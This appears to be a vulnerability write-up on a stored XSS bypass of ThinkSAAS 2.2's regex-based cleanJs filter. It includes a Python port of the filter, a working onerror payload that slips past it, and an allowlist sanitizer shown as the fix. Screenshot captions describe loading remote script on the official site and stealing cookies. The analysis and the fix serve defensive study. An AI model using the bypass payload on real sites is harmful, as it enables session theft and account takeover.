ThinkSAAS 2.2 stored XSS (bypassing the protection mechanism)
The rich-text filtering code (the cleanJs function):
function cleanJs($text) {
    $text = trim($text);
    //$text = stripslashes($text);
    // completely filter comments
    $text = @preg_replace('/<!--?.*-->/', '', $text);
    // completely filter dynamic code
    $text = @preg_replace('/<\?|\?>/', '', $text);
    // completely filter js
    $text = @preg_replace('/<script?.*\/script>/', '', $text);
    // filter excess html
    $text = @preg_replace('/<\/?(html|head|meta|link|base|body|title|style|script|form|iframe|frame|frameset|math|maction|marquee)[^><]*>/i', '', $text);
    // filter on-event attributes, lang, js
    while (preg_match('/(<[^><]+)(data|onmouse|onexit|onclick|onkey|onsuspend|onabort|onactivate|onafterprint|onafterupdate|onbeforeactivate|onbeforecopy|onbeforecut|onbeforedeactivate|onbeforeeditfocus|onbeforepaste|onbeforeprint|onbeforeunload|onbeforeupdate|onblur|onbounce|oncellchange|onchange|onclick|oncontextmenu|oncontrolselect|oncopy|oncut|ondataavailable|ondatasetchanged|ondatasetcomplete|ondblclick|ondeactivate|ondrag|ondragend|ondragenter|ondragleave|ondragover|ondragstart|ondrop|onerror|onerrorupdate|onfilterchange|onfinish|onfocus|onfocusin|onfocusout|onhelp|onkeydown|onkeypress|onkeyup|onlayoutcomplete|onload|onlosecapture|onmousedown|onmouseenter|onmouseleave|onmousemove|onmouseout|onmouseover|onmouseup|onmousewheel|onmove|onmoveend|onmovestart|onpaste|onpropertychange|onreadystatechange|onreset|onresize|onresizeend|onresizestart|onrowenter|onrowexit|onrowsdelete|onrowsinserted|onscroll|onselect|onselectionchange|onselectstart|onstart|onstop|onsubmit|onunload)[^><]+/i', $text, $mat)) {
        $text = str_replace($mat[0], $mat[1], $text);
    }
    while (preg_match('/(<[^><]+)(window\.|javascript:|js:|about:|file:|document\.|vbs:|cookie)([^><]*)/i', $text, $mat)) {
        $text = str_replace($mat[0], $mat[1] . $mat[3], $text);
    }
    return $text;
}
Event Filtering
while ( preg_match ( '/(<[^><]+)(data|onmouse|onexit|onclick|onkey|onsuspend|onabort|onactivate|onafterprint|onafterupdate|onbeforeactivate|onbeforecopy|onbeforecut|onbeforedeactivate|onbeforeeditfocus|onbeforepaste|onbeforeprint|onbeforeunload|onbeforeupdate|onblur|onbounce|oncellchange|onchange|onclick|oncontextmenu|oncontrolselect|oncopy|oncut|ondataavailable|ondatasetchanged|ondatasetcomplete|ondblclick|ondeactivate|ondrag|ondragend|ondragenter|ondragleave|ondragover|ondragstart|ondrop|onerror|onerrorupdate|onfilterchange|onfinish|onfocus|onfocusin|onfocusout|onhelp|onkeydown|onkeypress|onkeyup|onlayoutcomplete|onload|onlosecapture|onmousedown|onmouseenter|onmouseleave|onmousemove|onmouseout|onmouseover|onmouseup|onmousewheel|onmove|onmoveend|onmovestart|onpaste|onpropertychange|onreadystatechange|onreset|onresize|onresizeend|onresizestart|onrowenter|onrowexit|onrowsdelete|onrowsinserted|onscroll|onselect|onselectionchange|onselectstart|onstart|onstop|onsubmit|onunload)[^><]+/i', $text, $mat ) ) {$text = str_replace ( $mat [0], $mat [1], $text );}
That is a lot of filtering, but the regular expression has a flaw. Every piece of it that walks along a tag is a `[^><]` character class, which stops at the first `>` it meets, so a `>` placed inside a double-quoted attribute value ends the match before it reaches the handler, while the browser still treats what follows the closing quote as attributes of the same tag. The check is skipped and any on* event can be submitted, so the long list of event names is written for nothing.
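The following is an added example, not ThinkSAAS code: a Python port of the cleanJs() regexes reproduced above (the patterns are used unchanged; Python's `re` and PCRE agree on every construct they contain), run over two constructed inputs, one that the filter strips and one that carries a `>` inside a double-quoted attribute value and passes through untouched. For contrast it also shows the shape a real fix takes: an allowlist of tags and attributes applied to the output of an HTML tokeniser rather than a blacklist of event names applied with regexes. The tag/attribute allowlist, the permitted URL schemes and the sample payloads are assumptions chosen for the demonstration.

```python
import html
import re
from html.parser import HTMLParser

# --- 1. Port of cleanJs() from ThinkSAAS 2.2 (PHP/PCRE) to Python re. ----------
# Patterns are copied from the page unchanged; only the call syntax differs.
EVENT_RE = re.compile(
    r'(<[^><]+)(data|onmouse|onexit|onclick|onkey|onsuspend|onabort|onactivate|onafterprint|'
    r'onafterupdate|onbeforeactivate|onbeforecopy|onbeforecut|onbeforedeactivate|onbeforeeditfocus|'
    r'onbeforepaste|onbeforeprint|onbeforeunload|onbeforeupdate|onblur|onbounce|oncellchange|'
    r'onchange|onclick|oncontextmenu|oncontrolselect|oncopy|oncut|ondataavailable|ondatasetchanged|'
    r'ondatasetcomplete|ondblclick|ondeactivate|ondrag|ondragend|ondragenter|ondragleave|ondragover|'
    r'ondragstart|ondrop|onerror|onerrorupdate|onfilterchange|onfinish|onfocus|onfocusin|onfocusout|'
    r'onhelp|onkeydown|onkeypress|onkeyup|onlayoutcomplete|onload|onlosecapture|onmousedown|'
    r'onmouseenter|onmouseleave|onmousemove|onmouseout|onmouseover|onmouseup|onmousewheel|onmove|'
    r'onmoveend|onmovestart|onpaste|onpropertychange|onreadystatechange|onreset|onresize|onresizeend|'
    r'onresizestart|onrowenter|onrowexit|onrowsdelete|onrowsinserted|onscroll|onselect|'
    r'onselectionchange|onselectstart|onstart|onstop|onsubmit|onunload)[^><]+',
    re.IGNORECASE)
URL_RE = re.compile(
    r'(<[^><]+)(window\.|javascript:|js:|about:|file:|document\.|vbs:|cookie)([^><]*)',
    re.IGNORECASE)
TAG_RE = re.compile(
    r'</?(html|head|meta|link|base|body|title|style|script|form|iframe|frame|frameset|'
    r'math|maction|marquee)[^><]*>', re.IGNORECASE)


def clean_js(text: str) -> str:
    """Same steps, same order, same replace-in-a-loop logic as the PHP original."""
    text = text.strip()
    text = re.sub(r'<!--?.*-->', '', text)          # comments
    text = re.sub(r'<\?|\?>', '', text)             # <? ... ?> markers
    text = re.sub(r'<script?.*/script>', '', text)  # case-sensitive, like the original
    text = TAG_RE.sub('', text)                     # "excess html" tags
    while (m := EVENT_RE.search(text)):             # drop "onxxx=..." up to the next < or >
        text = text.replace(m.group(0), m.group(1))
    while (m := URL_RE.search(text)):               # drop only the scheme/keyword itself
        text = text.replace(m.group(0), m.group(1) + m.group(3))
    return text


# Constructed sample inputs (assumptions, not taken from the page). The second one
# puts a '>' inside a double-quoted value, so every [^><] run stops short of onerror.
PLAIN_SAMPLE = '<img src=x onerror=alert(1)>'
BYPASS_SAMPLE = '<img src="x>" onerror=alert(1)>'

# --- 2. What a fix looks like: allowlist on top of a real tokeniser (assumed policy). --
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
VOID_TAGS = {"br", "img"}


class AllowlistSanitizer(HTMLParser):
    """Re-serialise only allowlisted tags/attributes from the parser's tokens.
    on* handlers are never in the allowlist, so no list of event names is needed,
    and quoting tricks are resolved by the parser instead of by a regex."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                                   # tag dropped; its text is still escaped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            value = value or ""
            if name in ("href", "src"):              # scheme allowlist: no javascript:, data:, vbscript:
                v = value.strip().lower()
                same_site = v.startswith("/") and not v.startswith("//")
                if not (v.startswith(("http://", "https://")) or same_site):
                    continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def sanitize(fragment: str) -> str:
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    for sample in (PLAIN_SAMPLE, BYPASS_SAMPLE):
        print("cleanJs  :", clean_js(sample))
        print("allowlist:", sanitize(sample))
```

Run as a script, the first sample comes back from `clean_js` as `<img src=x >` while the second is returned verbatim with its `onerror` intact; `sanitize` drops the handler from both because it never matches handler names at all, it only copies attributes that are on the list. The design point is that a blacklist regex has to anticipate every way a browser can tokenise a tag, whereas an allowlist over a tokeniser's output only has to describe what is wanted.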
Loading remote JS this way (screenshot):
Tested on the official site (screenshot):
Remote JS loaded (screenshot):
Cookie theft and other operations follow (screenshot).
Solution:
See http://www.bkjia.com/Article/201406/311810.html.